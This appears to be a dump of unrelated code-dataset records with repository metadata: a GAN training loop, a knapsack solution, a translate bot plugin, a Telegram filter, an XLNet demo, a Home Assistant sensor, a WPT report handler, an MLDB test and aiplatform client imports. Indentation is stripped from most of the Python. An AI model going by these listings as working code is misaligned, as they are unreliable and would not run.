log_writer.add_scalar('Discriminator Loss: Real', loss_ganD_real.data, epoch*KK + i + 1)
log_writer.add_scalar('Discriminator Loss: Fake', loss_ganD_fake.data, epoch*KK + i + 1)
log_writer.add_scalar('Generator Loss: Alpha', al_loss.data, epoch*KK + i + 1)
log_writer.add_scalar('Generator Loss: Fg', fg_loss.data, epoch*KK + i + 1)
log_writer.add_scalar('Generator Loss: Comp', comp_loss.data, epoch*KK + i + 1)
t1=time.time()
elapse +=t1 -t0
elapse_run += t1-tr0
t0=t1
if i % step == (step-1):
print('[%d, %5d] Gen-loss: %.4f Disc-loss: %.4f Alpha-loss: %.4f Fg-loss: %.4f Comp-loss: %.4f Time-all: %.4f Time-fwbw: %.4f' %(epoch + 1, i + 1, lG/step,lD/step,alL/step,fgL/step,compL/step,elapse/step,elapse_run/step))
lG, lD, GenL, DisL_r, DisL_f, alL, fgL, compL, elapse_run, elapse=0,0,0,0,0,0,0,0,0,0
write_tb_log(image,'image',log_writer,i)
write_tb_log(seg,'seg',log_writer,i)
write_tb_log(alpha_pred_sup,'alpha-sup',log_writer,i)
write_tb_log(alpha_pred,'alpha_pred',log_writer,i)
write_tb_log(fg_pred_sup*mask,'fg-pred-sup',log_writer,i)
write_tb_log(fg_pred*mask,'fg_pred',log_writer,i)
#composition
alpha_pred=(alpha_pred+1)/2
comp=fg_pred*alpha_pred + (1-alpha_pred)*bg
write_tb_log(comp,'composite-same',log_writer,i)
write_tb_log(image_sh,'composite-diff',log_writer,i)
del comp
del mask, back_rnd, mask0, seg_gt, mask1, bg, alpha_pred, alpha_pred_sup, image, fg_pred_sup, fg_pred, seg, multi_fr,image_sh, bg_sh, fake_response, real_response, al_loss, fg_loss, comp_loss, lossG, lossD, loss_ganD_real, loss_ganD_fake, loss_ganG
if (epoch%2 == 0):
torch.save(netG.state_dict(), model_dir + 'netG_epoch_%d.pth' %(epoch))
torch.save(optimizerG.state_dict(), model_dir + 'optimG_epoch_%d.pth' %(epoch))
torch.save(netD.state_dict(), model_dir + 'netD_epoch_%d.pth' %(epoch))
torch.save(optimizerD.state_dict(), model_dir + 'optimD_epoch_%d.pth' %(epoch))
#Change weight every 2 epoch to put more stress on discriminator weight and less on pseudo-supervision
wt=wt/2
|
fb3355c6b1b2db63c814c9602cdd7587f09300b8
|
f305f84ea6f721c2391300f0a60e21d2ce14f2a5
|
/20_杂题/牛客编程巅峰赛/7_ 牛妹的春游-二维的01背包.py
|
123f68d93fa59b40c8d237e19fce46905c1d3026
|
[] |
no_license
|
981377660LMT/algorithm-study
|
f2ada3e6959338ae1bc21934a84f7314a8ecff82
|
7e79e26bb8f641868561b186e34c1127ed63c9e0
|
refs/heads/master
| 2023-09-01T18:26:16.525579
| 2023-09-01T12:21:58
| 2023-09-01T12:21:58
| 385,861,235
| 225
| 24
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,043
|
py
|
7_ 牛妹的春游-二维的01背包.py
|
# Given two positive integers x and y, and a set of triples [ai, bi, ci],
# pick triples so that the sum of the chosen ai is at least x and the sum of the
# chosen bi is at least y, and minimize the sum of the chosen ci.
# breadNum, beverageNum <= 2000 hints that these two quantities are the DP state.
# Use a 2D array for the state: the first dimension is the amount of bread,
# the second dimension is the amount of beverage.
INF = 0x3F3F3F3F
class Solution:
def minCost(self, breadNum, beverageNum, packageSum):
n = len(packageSum)
dp = [[INF] * (beverageNum + 1) for _ in range(breadNum + 1)]
dp[0][0] = 0
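        # Iterate i and j downward so each package is used at most once (0/1 knapsack);
        # max(0, ...) clamps the indices because any surplus beyond breadNum/beverageNum
        # collapses into the same "requirement already met" state.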
for k in range(n):
num1, num2, cost = packageSum[k]
for i in range(breadNum, -1, -1):
for j in range(beverageNum, -1, -1):
dp[i][j] = min(dp[i][j], dp[max(0, i - num1)][max(0, j - num2)] + cost)
return dp[-1][-1]
print(
Solution().minCost(
5, 60, [[3, 36, 120], [10, 25, 129], [5, 50, 250], [1, 45, 130], [4, 20, 119]]
)
)
|
9022f3b5716f268f2b3b268f4ae65c2c33d720c4
|
c4f29914827284c581aabeee126e0c42dc7e1a56
|
/plugins/translate.py
|
e5774dcd8e5e476b91ca202b9541cb8f6c5b9d8f
|
[
"Unlicense",
"LicenseRef-scancode-unknown-license-reference",
"LicenseRef-scancode-public-domain"
] |
permissive
|
rmmh/skybot
|
66a7698d960026da52ee2413845d1ca364a1713f
|
3bfaad863a833a25b145b094a803f742d3aec1b8
|
refs/heads/master
| 2023-08-29T21:29:14.094136
| 2023-08-15T02:38:23
| 2023-08-15T02:38:23
| 855,503
| 155
| 131
|
Unlicense
| 2023-03-29T00:21:52
| 2010-08-22T22:38:50
|
Python
|
UTF-8
|
Python
| false
| false
| 5,554
|
py
|
translate.py
|
"""
A Google API key is required and retrieved from the bot config file.
Since December 1, 2011, the Google Translate API is a paid service only.
"""
from builtins import zip
from builtins import chr
import html.entities
import re
from util import hook, http
########### from http://effbot.org/zone/re-sub.htm#unescape-html #############
def unescape(text):
def fixup(m):
text = m.group(0)
if text[:2] == "&#":
# character reference
try:
if text[:3] == "&#x":
return chr(int(text[3:-1], 16))
else:
return chr(int(text[2:-1]))
except ValueError:
pass
else:
# named entity
try:
text = chr(html.entities.name2codepoint[text[1:-1]])
except KeyError:
pass
return text # leave as is
    return re.sub(r"&#?\w+;", fixup, text)
##############################################################################
def goog_trans(api_key, text, slang, tlang):
url = "https://www.googleapis.com/language/translate/v2"
parsed = http.get_json(url, key=api_key, q=text, source=slang, target=tlang)
if not 200 <= parsed["responseStatus"] < 300:
raise IOError(
"error with the translation server: %d: %s"
% (parsed["responseStatus"], parsed["responseDetails"])
)
if not slang:
return unescape(
"(%(detectedSourceLanguage)s) %(translatedText)s"
% (parsed["responseData"]["data"]["translations"][0])
)
return unescape(
"%(translatedText)s" % parsed["responseData"]["data"]["translations"][0]
)
def match_language(fragment):
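    # Two-pass lookup: first try the short language codes, then fall back to a
    # substring match against the full language names in lang_pairs.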
fragment = fragment.lower()
for short, _ in lang_pairs:
if fragment in short.lower().split():
return short.split()[0]
for short, full in lang_pairs:
if fragment in full.lower():
return short.split()[0]
return None
@hook.api_key("google")
@hook.command
def translate(inp, api_key=""):
".translate [source language [target language]] <sentence> -- translates" " <sentence> from source language (default autodetect) to target" " language (default English) using Google Translate"
args = inp.split(" ", 2)
try:
if len(args) >= 2:
sl = match_language(args[0])
if not sl:
return goog_trans(api_key, inp, "", "en")
if len(args) == 2:
return goog_trans(api_key, args[1], sl, "en")
if len(args) >= 3:
tl = match_language(args[1])
if not tl:
if sl == "en":
return "unable to determine desired target language"
return goog_trans(api_key, args[1] + " " + args[2], sl, "en")
return goog_trans(api_key, args[2], sl, tl)
return goog_trans(api_key, inp, "", "en")
except IOError as e:
return e
languages = "ja fr de ko ru zh".split()
language_pairs = zip(languages[:-1], languages[1:])
def babel_gen(api_key, inp):
for language in languages:
inp = inp.encode("utf8")
trans = goog_trans(api_key, inp, "en", language).encode("utf8")
inp = goog_trans(api_key, trans, language, "en")
yield language, trans, inp
@hook.api_key("google")
@hook.command
def babel(inp, api_key=""):
".babel <sentence> -- translates <sentence> through multiple languages"
try:
return list(babel_gen(api_key, inp))[-1][2]
except IOError as e:
return e
@hook.api_key("google")
@hook.command
def babelext(inp, api_key=""):
".babelext <sentence> -- like .babel, but with more detailed output"
try:
babels = list(babel_gen(api_key, inp))
except IOError as e:
return e
out = ""
for lang, trans, text in babels:
out += '%s:"%s", ' % (lang, text.decode("utf8"))
out += 'en:"' + babels[-1][2].decode("utf8") + '"'
if len(out) > 300:
out = out[:150] + " ... " + out[-150:]
return out
lang_pairs = [
("no", "Norwegian"),
("it", "Italian"),
("ht", "Haitian Creole"),
("af", "Afrikaans"),
("sq", "Albanian"),
("ar", "Arabic"),
("hy", "Armenian"),
("az", "Azerbaijani"),
("eu", "Basque"),
("be", "Belarusian"),
("bg", "Bulgarian"),
("ca", "Catalan"),
("zh-CN zh", "Chinese"),
("hr", "Croatian"),
("cs", "Czech"),
("da", "Danish"),
("nl", "Dutch"),
("en", "English"),
("et", "Estonian"),
("tl", "Filipino"),
("fi", "Finnish"),
("fr", "French"),
("gl", "Galician"),
("ka", "Georgian"),
("de", "German"),
("el", "Greek"),
("ht", "Haitian Creole"),
("iw", "Hebrew"),
("hi", "Hindi"),
("hu", "Hungarian"),
("is", "Icelandic"),
("id", "Indonesian"),
("ga", "Irish"),
("it", "Italian"),
("ja jp jpn", "Japanese"),
("ko", "Korean"),
("lv", "Latvian"),
("lt", "Lithuanian"),
("mk", "Macedonian"),
("ms", "Malay"),
("mt", "Maltese"),
("no", "Norwegian"),
("fa", "Persian"),
("pl", "Polish"),
("pt", "Portuguese"),
("ro", "Romanian"),
("ru", "Russian"),
("sr", "Serbian"),
("sk", "Slovak"),
("sl", "Slovenian"),
("es", "Spanish"),
("sw", "Swahili"),
("sv", "Swedish"),
("th", "Thai"),
("tr", "Turkish"),
("uk", "Ukrainian"),
("ur", "Urdu"),
("vi", "Vietnamese"),
("cy", "Welsh"),
("yi", "Yiddish"),
]
|
28e970f9afb6961a110c42689baf89794ba5320d
|
489f789e19ddf0f10cd739b3f091b5c61a63a857
|
/agent/utils/filter.py
|
dae42276c92bf44e78c833f5f1b08e5c417f2639
|
[] |
no_license
|
adityathebe/telegramForwarder
|
7523db3107911d5845f9e2ea887b4f7bd4e32953
|
d72e2264704f15ee5a78a14e11d50dc6be06519a
|
refs/heads/master
| 2021-06-15T08:10:10.101750
| 2021-05-03T17:23:17
| 2021-05-03T17:23:17
| 156,350,910
| 161
| 133
| null | 2021-02-15T13:38:31
| 2018-11-06T08:27:57
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 4,278
|
py
|
filter.py
|
import logging
from db.database import Database
logger = logging.getLogger('Filter')
database = Database()
class MessageFilter:
@staticmethod
def get_filter(filter_id):
filter = database.get_filter(filter_id)
if filter is None:
return False
filter_dict = {
'id': filter[0],
'audio': filter[1],
'video': filter[2],
'photo': filter[3],
'sticker': filter[4],
'document': filter[5],
'hashtag': filter[6],
'link': filter[7],
'contain': filter[8],
'notcontain': filter[9]
}
return filter_dict
@staticmethod
def get_active_filters(filter_dict):
"""
Takes in a filter dictionary
Returns a list of active filter names
        Example: ['photo', 'audio']
"""
if not isinstance(filter_dict, dict):
raise ValueError('Provide a dictionary')
active_filter_list = []
for key, value in filter_dict.items():
if value != 0 and value is not None:
if key != 'id':
active_filter_list.append(key)
return active_filter_list
@staticmethod
def get_message_type(event):
# Photos Messages
if hasattr(event.media, 'photo'):
return 'photo'
# Look for links and hashtags in event.entities
if event.entities is not None:
for entity in event.entities:
entity_name = type(entity).__name__
if entity_name == 'MessageEntityHashtag':
return 'hashtag'
if entity_name == 'MessageEntityUrl':
return 'link'
# Text Messages
        if event.media is None:
return 'text'
# Documents (audio, video, sticker, files)
mime_type = event.media.document.mime_type
if 'audio' in mime_type:
return 'audio'
if 'video' in mime_type:
return 'video'
if 'image/webp' in mime_type:
return 'sticker'
# Anything else is a file
return 'document'
@staticmethod
def filter_msg(filter_id, message_event):
"""
Function that decides if a message should be forwarded or not
Returns Boolean
"""
# Get Filter dictionary from database
filter_dict = MessageFilter.get_filter(filter_id)
        if filter_dict is False:
logger.info('No filters for id : {}'.format(filter_id))
return False
# Get Active Filter list
filter_list = MessageFilter.get_active_filters(filter_dict)
# Get Message Types
msg_type = MessageFilter.get_message_type(message_event)
msg_text = message_event.message.text.lower()
if msg_type in filter_list:
logger.info(f'Filter caught :: {msg_type}')
return True
if 'contain' not in filter_list and 'notcontain' not in filter_list:
logger.info('All filters passed.')
return False
# Assume message does not contain the required word
contains_required_word = False
if 'contain' in filter_list:
# Look for text messages only
if message_event.media is not None:
return False
keywords = filter_dict['contain'].split('<stop_word>')
for keyword in keywords:
if keyword in msg_text:
contains_required_word = True
break
# Assume message does contain the blacklist word
contains_blacklist_word = False
if 'notcontain' in filter_list:
# Look for text messages only
if message_event.media is not None:
return False
keywords = filter_dict['notcontain'].split('<stop_word>')
for keyword in keywords:
if keyword in msg_text:
contains_blacklist_word = True
break
logger.info('Contains word :: {} && Contains Blacklist :: {}'.format(
contains_required_word, contains_blacklist_word))
return (not contains_required_word) or contains_blacklist_word
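# Hedged usage sketch (added for illustration; not part of the original module).
# It exercises the pure helper get_active_filters with a dictionary shaped like
# the one get_filter builds from a database row, so the sketch itself never
# touches the Database (importing this module still does, via db.database).
if __name__ == "__main__":
    example_filter = {
        'id': 1, 'audio': 0, 'video': 1, 'photo': 1, 'sticker': 0,
        'document': 0, 'hashtag': 0, 'link': 1, 'contain': None, 'notcontain': None
    }
    # Non-zero, non-None entries other than 'id' are active -> ['video', 'photo', 'link']
    print(MessageFilter.get_active_filters(example_filter))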
|
8d6d3bc3651f695962398b6595481de43607d91c
|
b60a81fd1ecaf62eb7e367f739e77049895352e2
|
/demo/GLUE/RTE/rte.py
|
b01b2af2ff2aede68c94fd01747fbfb7acdea499
|
[
"MIT"
] |
permissive
|
CyberZHG/keras-xlnet
|
3453e61bae702611e3f30e86a73f80a41f32f7de
|
d9dbd2c00d9ffbf1d12a8bf3ef75ece4b25b06de
|
refs/heads/master
| 2022-02-04T20:35:32.928627
| 2022-01-01T02:00:00
| 2022-01-01T02:00:00
| 192,900,188
| 190
| 34
|
MIT
| 2019-07-15T16:52:14
| 2019-06-20T10:30:13
|
Python
|
UTF-8
|
Python
| false
| false
| 3,728
|
py
|
rte.py
|
import os
import numpy as np
import pandas as pd
from keras_xlnet.backend import keras
from keras_bert.layers import Extract
from keras_xlnet import PretrainedList, get_pretrained_paths
from keras_xlnet import Tokenizer, load_trained_model_from_checkpoint, ATTENTION_TYPE_BI
EPOCH = 10
BATCH_SIZE = 16
SEQ_LEN = 100
MODEL_NAME = 'RTE.h5'
CLASSES = {
'not_entailment': 0,
'entailment': 1,
}
current_path = os.path.dirname(os.path.abspath(__file__))
train_path = os.path.join(current_path, 'train.tsv')
dev_path = os.path.join(current_path, 'dev.tsv')
paths = get_pretrained_paths(PretrainedList.en_cased_base)
tokenizer = Tokenizer(paths.vocab)
# Read data
class DataSequence(keras.utils.Sequence):
def __init__(self, x, y):
self.x = x
self.y = y
def __len__(self):
return (len(self.y) + BATCH_SIZE - 1) // BATCH_SIZE
def __getitem__(self, index):
s = slice(index * BATCH_SIZE, (index + 1) * BATCH_SIZE)
return [item[s] for item in self.x], self.y[s]
def generate_sequence(path):
tokens, classes = [], []
df = pd.read_csv(path, sep='\t', error_bad_lines=False)
for _, row in df.iterrows():
text_a, text_b, cls = row['sentence1'], row['sentence2'], row['label']
if not isinstance(text_a, str) or not isinstance(text_b, str) or cls not in CLASSES:
continue
encoded_a, encoded_b = tokenizer.encode(text_a)[:48], tokenizer.encode(text_b)[:49]
encoded = encoded_a + [tokenizer.SYM_SEP] + encoded_b + [tokenizer.SYM_SEP]
encoded = [tokenizer.SYM_PAD] * (SEQ_LEN - 1 - len(encoded)) + encoded + [tokenizer.SYM_CLS]
tokens.append(encoded)
classes.append(CLASSES[cls])
tokens, classes = np.array(tokens), np.array(classes)
segments = np.zeros_like(tokens)
segments[:, -1] = 1
lengths = np.zeros_like(tokens[:, :1])
return DataSequence([tokens, segments, lengths], classes)
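# Note on the layout produced above (added comment, paraphrased from the code):
# every sample is left-padded so that the final token is always SYM_CLS, i.e.
#   [PAD, ..., PAD, tokens_a, SEP, tokens_b, SEP, CLS]
# and segments[:, -1] = 1 marks only that trailing CLS slot, which is the
# position the classification head later reads out via Extract(index=-1).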
current_path = os.path.dirname(os.path.abspath(__file__))
train_seq = generate_sequence(train_path)
dev_seq = generate_sequence(dev_path)
# Load pretrained model
model = load_trained_model_from_checkpoint(
config_path=paths.config,
checkpoint_path=paths.model,
batch_size=BATCH_SIZE,
memory_len=0,
target_len=SEQ_LEN,
in_train_phase=False,
attention_type=ATTENTION_TYPE_BI,
)
# Build classification model
last = Extract(index=-1, name='Extract')(model.output)
dense = keras.layers.Dense(units=768, activation='tanh', name='Dense')(last)
dropout = keras.layers.Dropout(rate=0.1, name='Dropout')(dense)
output = keras.layers.Dense(units=2, activation='softmax', name='Softmax')(dropout)
model = keras.models.Model(inputs=model.inputs, outputs=output)
model.summary()
# Fit model
if os.path.exists(MODEL_NAME):
model.load_weights(MODEL_NAME)
model.compile(
optimizer=keras.optimizers.Adam(lr=3e-5),
loss='sparse_categorical_crossentropy',
metrics=['sparse_categorical_accuracy'],
)
model.fit_generator(
generator=train_seq,
validation_data=dev_seq,
epochs=EPOCH,
callbacks=[keras.callbacks.EarlyStopping(monitor='val_loss', patience=2)],
)
model.save_weights(MODEL_NAME)
# Evaluation
# Use the dev set because the results on the test set are unknown
results = model.predict_generator(dev_seq, verbose=True).argmax(axis=-1)
tp, fp, fn, tn = 0, 0, 0, 0
for i in range(len(results)):
if results[i] == 1:
if dev_seq.y[i] == 1:
tp += 1
else:
fp += 1
else:
if dev_seq.y[i] == 1:
fn += 1
else:
tn += 1
print('Confusion:')
print('[{}, {}]'.format(tp, fp))
print('[{}, {}]'.format(fn, tn))
print('Accuracy: %.2f' % (100.0 * (tp + tn) / len(results)))
|
b495a2d500f1e59c0a15fff0eb7863daeaa9e308
|
96dcea595e7c16cec07b3f649afd65f3660a0bad
|
/homeassistant/components/vilfo/sensor.py
|
511e25bbfbaa8bf10fd231447855a48a95f50829
|
[
"Apache-2.0"
] |
permissive
|
home-assistant/core
|
3455eac2e9d925c92d30178643b1aaccf3a6484f
|
80caeafcb5b6e2f9da192d0ea6dd1a5b8244b743
|
refs/heads/dev
| 2023-08-31T15:41:06.299469
| 2023-08-31T14:50:53
| 2023-08-31T14:50:53
| 12,888,993
| 35,501
| 20,617
|
Apache-2.0
| 2023-09-14T21:50:15
| 2013-09-17T07:29:48
|
Python
|
UTF-8
|
Python
| false
| false
| 2,883
|
py
|
sensor.py
|
"""Support for Vilfo Router sensors."""
from dataclasses import dataclass
from homeassistant.components.sensor import (
SensorDeviceClass,
SensorEntity,
SensorEntityDescription,
)
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import PERCENTAGE
from homeassistant.core import HomeAssistant
from homeassistant.helpers.device_registry import DeviceInfo
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from .const import (
ATTR_API_DATA_FIELD_BOOT_TIME,
ATTR_API_DATA_FIELD_LOAD,
ATTR_BOOT_TIME,
ATTR_LOAD,
DOMAIN,
ROUTER_DEFAULT_MODEL,
ROUTER_DEFAULT_NAME,
ROUTER_MANUFACTURER,
)
@dataclass
class VilfoRequiredKeysMixin:
"""Mixin for required keys."""
api_key: str
@dataclass
class VilfoSensorEntityDescription(SensorEntityDescription, VilfoRequiredKeysMixin):
"""Describes Vilfo sensor entity."""
SENSOR_TYPES: tuple[VilfoSensorEntityDescription, ...] = (
VilfoSensorEntityDescription(
key=ATTR_LOAD,
translation_key=ATTR_LOAD,
native_unit_of_measurement=PERCENTAGE,
icon="mdi:memory",
api_key=ATTR_API_DATA_FIELD_LOAD,
),
VilfoSensorEntityDescription(
key=ATTR_BOOT_TIME,
translation_key=ATTR_BOOT_TIME,
icon="mdi:timer-outline",
api_key=ATTR_API_DATA_FIELD_BOOT_TIME,
device_class=SensorDeviceClass.TIMESTAMP,
),
)
async def async_setup_entry(
hass: HomeAssistant,
config_entry: ConfigEntry,
async_add_entities: AddEntitiesCallback,
) -> None:
"""Add Vilfo Router entities from a config_entry."""
vilfo = hass.data[DOMAIN][config_entry.entry_id]
entities = [VilfoRouterSensor(vilfo, description) for description in SENSOR_TYPES]
async_add_entities(entities, True)
class VilfoRouterSensor(SensorEntity):
"""Define a Vilfo Router Sensor."""
entity_description: VilfoSensorEntityDescription
_attr_has_entity_name = True
def __init__(self, api, description: VilfoSensorEntityDescription) -> None:
"""Initialize."""
self.entity_description = description
self.api = api
self._attr_device_info = DeviceInfo(
identifiers={(DOMAIN, api.host, api.mac_address)}, # type: ignore[arg-type]
name=ROUTER_DEFAULT_NAME,
manufacturer=ROUTER_MANUFACTURER,
model=ROUTER_DEFAULT_MODEL,
sw_version=api.firmware_version,
)
self._attr_unique_id = f"{api.unique_id}_{description.key}"
@property
def available(self) -> bool:
"""Return whether the sensor is available or not."""
return self.api.available
async def async_update(self) -> None:
"""Update the router data."""
await self.api.async_update()
self._attr_native_value = self.api.data.get(self.entity_description.api_key)
|
f0b078fa1be3036d20bc07f275ac126b1303ac08
|
a3d6556180e74af7b555f8d47d3fea55b94bcbda
|
/third_party/blink/web_tests/external/wpt/attribution-reporting/resources/reports.py
|
b71743b0fc04db7afd38e619377b032b34a86348
|
[
"BSD-3-Clause",
"GPL-1.0-or-later",
"MIT",
"LGPL-2.0-or-later",
"Apache-2.0",
"LicenseRef-scancode-warranty-disclaimer",
"LGPL-2.1-only",
"GPL-2.0-only",
"LGPL-2.0-only",
"BSD-2-Clause",
"LicenseRef-scancode-other-copyleft"
] |
permissive
|
chromium/chromium
|
aaa9eda10115b50b0616d2f1aed5ef35d1d779d6
|
a401d6cf4f7bf0e2d2e964c512ebb923c3d8832c
|
refs/heads/main
| 2023-08-24T00:35:12.585945
| 2023-08-23T22:01:11
| 2023-08-23T22:01:11
| 120,360,765
| 17,408
| 7,102
|
BSD-3-Clause
| 2023-09-10T23:44:27
| 2018-02-05T20:55:32
| null |
UTF-8
|
Python
| false
| false
| 4,672
|
py
|
reports.py
|
"""Methods for the report-event-attribution and report-aggregate-attribution endpoints"""
import json
from typing import List, Optional, Tuple
import urllib.parse
from wptserve.request import Request
from wptserve.stash import Stash
from wptserve.utils import isomorphic_decode, isomorphic_encode
# Key used to access the reports in the stash.
REPORTS = "4691a2d7fca5430fb0f33b1bd8a9d388"
REDIRECT = "9250f93f-2c05-4aae-83b9-2817b0e18b4e"
CLEAR_STASH = isomorphic_encode("clear_stash")
CONFIG_REDIRECT = isomorphic_encode("redirect_to")
Header = Tuple[str, str]
Status = Tuple[int, str]
Response = Tuple[Status, List[Header], str]
def decode_headers(headers: dict) -> dict:
"""Decodes the headers from wptserve.
wptserve headers are encoded like
{
encoded(key): [encoded(value1), encoded(value2),...]
}
This method decodes the above using the wptserve.utils.isomorphic_decode
method
"""
return {
isomorphic_decode(key): [isomorphic_decode(el) for el in value
] for key, value in headers.items()
}
def get_request_origin(request: Request) -> str:
return "%s://%s" % (request.url_parts.scheme,
request.url_parts.netloc)
def configure_redirect(request, origin) -> None:
with request.server.stash.lock:
request.server.stash.put(REDIRECT, origin)
return None
def get_report_redirect_url(request):
with request.server.stash.lock:
origin = request.server.stash.take(REDIRECT)
if origin is None:
return None
origin_parts = urllib.parse.urlsplit(origin)
parts = request.url_parts
new_parts = origin_parts._replace(path=bytes(parts.path, 'utf-8'))
return urllib.parse.urlunsplit(new_parts)
def handle_post_report(request: Request, headers: List[Header]) -> Response:
"""Handles POST request for reports.
Retrieves the report from the request body and stores the report in the
stash. If clear_stash is specified in the query params, clears the stash.
"""
if request.GET.get(CLEAR_STASH):
clear_stash(request.server.stash)
return (200, "OK"), headers, json.dumps({
"code": 200,
"message": "Stash successfully cleared.",
})
redirect_origin = request.GET.get(CONFIG_REDIRECT)
if redirect_origin:
configure_redirect(request, redirect_origin)
return (200, "OK"), headers, json.dumps({
"code": 200,
"message": "Redirect successfully configured.",
})
redirect_url = get_report_redirect_url(request)
if redirect_url is not None:
headers.append(("Location", redirect_url))
return (308, "Permanent Redirect"), headers, json.dumps({
"code": 308
})
store_report(
request.server.stash, get_request_origin(request), {
"body": request.body.decode("utf-8"),
"headers": decode_headers(request.headers)
})
return (201, "OK"), headers, json.dumps({
"code": 201,
"message": "Report successfully stored."
})
def handle_get_reports(request: Request, headers: List[Header]) -> Response:
"""Handles GET request for reports.
Retrieves and returns all reports from the stash.
"""
reports = take_reports(request.server.stash, get_request_origin(request))
headers.append(("Access-Control-Allow-Origin", "*"))
return (200, "OK"), headers, json.dumps({
"code": 200,
"reports": reports,
})
def store_report(stash: Stash, origin: str, report: dict) -> None:
    """Stores the report in the stash. Report here is a dict with the JSON body and headers."""
with stash.lock:
reports_dict = stash.take(REPORTS)
if not reports_dict:
reports_dict = {}
reports = reports_dict.get(origin, [])
reports.append(report)
reports_dict[origin] = reports
stash.put(REPORTS, reports_dict)
return None
def clear_stash(stash: Stash) -> None:
"Clears the stash."
stash.take(REPORTS)
stash.take(REDIRECT)
return None
def take_reports(stash: Stash, origin: str) -> List[dict]:
"""Takes all the reports from the stash and returns them."""
with stash.lock:
reports_dict = stash.take(REPORTS)
if not reports_dict:
reports_dict = {}
reports = reports_dict.pop(origin, [])
stash.put(REPORTS, reports_dict)
return reports
def handle_reports(request: Request) -> Response:
"""Handles request to get or store reports."""
headers = [("Content-Type", "application/json")]
if request.method == "POST":
return handle_post_report(request, headers)
if request.method == "GET":
return handle_get_reports(request, headers)
return (405, "Method Not Allowed"), headers, json.dumps({
"code": 405,
"message": "Only GET or POST methods are supported."
})
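# Hedged illustration (added for clarity; not part of the original handlers).
# A plain dict stands in for the wptserve Stash to show the per-origin shape
# that store_report writes and take_reports drains.
if __name__ == "__main__":
    fake_stash = {}
    origin = "https://reporter.example"  # hypothetical reporting origin
    fake_stash.setdefault(origin, []).append(
        {"body": "{}", "headers": {"Content-Type": ["application/json"]}})
    # A GET for that origin removes and returns everything stored for it.
    drained = fake_stash.pop(origin, [])
    print("%d report(s) returned" % len(drained))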
|
894e9b42c7f418b7e19a5fe4cf60eca3033ed0ea
|
479a9c76b19b84d6cde69305828031cd2531aa56
|
/testing/MLDB-696_uri_causes_crash.py
|
6a3507a5c4adda750d3ca2a1fb059eca0754e204
|
[
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
mldbai/mldb
|
d36801bd99dd3f82d7557cd0f438b0121f63f22c
|
19bc4bc92a41ee8ad4eab0979dffd9c985d95758
|
refs/heads/master
| 2023-09-03T22:59:11.621839
| 2022-12-30T18:42:24
| 2022-12-30T18:42:24
| 47,634,692
| 701
| 107
|
Apache-2.0
| 2023-02-10T23:08:05
| 2015-12-08T16:34:16
|
C++
|
UTF-8
|
Python
| false
| false
| 716
|
py
|
MLDB-696_uri_causes_crash.py
|
# This file is part of MLDB. Copyright 2015 mldb.ai inc. All rights reserved.
try:
mldb.create_dataset({
"type": "beh.mutable", "id": "x",
"params":{
"dataFileUrl": "relative/path/without/protocol.beh"
}}).commit() #should complain about missing protocol!
request.set_return("failure")
exit()
except:
pass
try:
mldb.create_dataset({
"type": "beh.mutable", "id": "y",
"params":{
"dataFileUrl": "/asbolute/path/without/protocol.beh"
}}).commit() #should complain about missing protocol!
request.set_return("failure")
exit()
except:
pass
request.set_return("success")
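# Added note (not part of the original test): both create_dataset calls above
# are expected to fail because "dataFileUrl" has no protocol prefix; a value
# such as "file:///some/path/protocol.beh" would presumably be accepted.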
|
8c66a1665ff3bd28663c4c82e3aaa8412f787f53
|
99dcb18a9e3ea367272f740b8cbf3c34285a0c08
|
/google/cloud/aiplatform_v1/services/tensorboard_service/client.py
|
34f95b1bac48946a07f47479058113b7261651a6
|
[
"Apache-2.0"
] |
permissive
|
googleapis/python-aiplatform
|
926a4873f35dbea15b2fd86c0e16b5e6556d803e
|
76b95b92c1d3b87c72d754d8c02b1bca652b9a27
|
refs/heads/main
| 2023-08-19T23:49:02.180075
| 2023-08-19T13:25:59
| 2023-08-19T13:27:27
| 298,017,988
| 418
| 240
|
Apache-2.0
| 2023-09-14T21:08:33
| 2020-09-23T15:43:39
|
Python
|
UTF-8
|
Python
| false
| false
| 213,036
|
py
|
client.py
|
# -*- coding: utf-8 -*-
# Copyright 2023 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from collections import OrderedDict
import os
import re
from typing import (
Dict,
Mapping,
MutableMapping,
MutableSequence,
Optional,
Iterable,
Sequence,
Tuple,
Type,
Union,
cast,
)
from google.cloud.aiplatform_v1 import gapic_version as package_version
from google.api_core import client_options as client_options_lib
from google.api_core import exceptions as core_exceptions
from google.api_core import gapic_v1
from google.api_core import retry as retries
from google.auth import credentials as ga_credentials # type: ignore
from google.auth.transport import mtls # type: ignore
from google.auth.transport.grpc import SslCredentials # type: ignore
from google.auth.exceptions import MutualTLSChannelError # type: ignore
from google.oauth2 import service_account # type: ignore
try:
OptionalRetry = Union[retries.Retry, gapic_v1.method._MethodDefault]
except AttributeError: # pragma: NO COVER
OptionalRetry = Union[retries.Retry, object] # type: ignore
from google.api_core import operation as gac_operation # type: ignore
from google.api_core import operation_async # type: ignore
from google.cloud.aiplatform_v1.services.tensorboard_service import pagers
from google.cloud.aiplatform_v1.types import encryption_spec
from google.cloud.aiplatform_v1.types import operation as gca_operation
from google.cloud.aiplatform_v1.types import tensorboard
from google.cloud.aiplatform_v1.types import tensorboard as gca_tensorboard
from google.cloud.aiplatform_v1.types import tensorboard_data
from google.cloud.aiplatform_v1.types import tensorboard_experiment
from google.cloud.aiplatform_v1.types import (
tensorboard_experiment as gca_tensorboard_experiment,
)
from google.cloud.aiplatform_v1.types import tensorboard_run
from google.cloud.aiplatform_v1.types import tensorboard_run as gca_tensorboard_run
from google.cloud.aiplatform_v1.types import tensorboard_service
from google.cloud.aiplatform_v1.types import tensorboard_time_series
from google.cloud.aiplatform_v1.types import (
tensorboard_time_series as gca_tensorboard_time_series,
)
from google.cloud.location import locations_pb2 # type: ignore
from google.iam.v1 import iam_policy_pb2 # type: ignore
from google.iam.v1 import policy_pb2 # type: ignore
from google.longrunning import operations_pb2
